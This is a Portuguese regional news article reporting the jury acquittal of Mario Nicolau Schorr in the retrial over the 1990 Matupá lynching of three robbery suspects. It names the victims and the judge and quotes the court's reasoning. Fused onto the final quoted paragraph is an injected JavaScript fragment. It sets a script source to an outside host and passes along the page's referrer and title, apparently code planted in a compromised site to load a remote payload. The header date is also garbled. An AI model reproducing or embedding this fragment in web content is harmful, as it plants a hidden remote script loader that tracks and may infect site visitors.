Capa / Cidades / Acusado de participar da ‘chacina de Matupá’ é absolvido

Acusado de participar da ‘chacina de Matupá’ é absolvido

20272027Olhar Cidade

O júri que aconteceu durante esta segunda-feira (18-04), na Comarca de Matupá e acabou absolvendo o acusado

Mario Nicolau Schorr, sendo inocentado de todo o crime, o advogado da defesa Marcus Augusto Giraldi Macedo trabalhou para inocentar o réu, o que ocorreu no final da tarde.

O primeiro julgamento de Mario Nicolau Schorr, no qual ele foi condenado pela morte de duas das vítimas, foi anulado pelo Tribunal de Justiça de Mato Grosso.

O ex-governador Silval Barbosa (PMDB), que está preso no Centro de Custódia de Cuiabá acusado de receber propina em troca da concessão de benefícios fiscais, chegou a ser arrolado como testemunha de defesa do réu, mas o depoimento dele foi dispensado pelo juiz Fábio Petengill, da Comarca de Matupá, que entendeu desnecessária a oitiva.

As vítimas da chacina, Ivanir Garcia dos Santos, Arci Garcia dos Santos e Osvaldo José Bachmann, foram linchados por populares depois de terem feito crianças e mulheres reféns durante um assalto em 1990 no município.

No primeiro julgamento, em outubro de 2011, Schorr foi condenado por dois homicídios e absolvido do terceiro. “(…) Sem que existisse qualquer tese exculpante quanto à conduta a ele atribuída, que teria se voltado contra os três mortos e não de forma individualizada com relação a cada um, não há outra medida senão designar nova Sessão do Tribunal do Júri”, afirmou o juiz Fábio Petengill nos autos.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top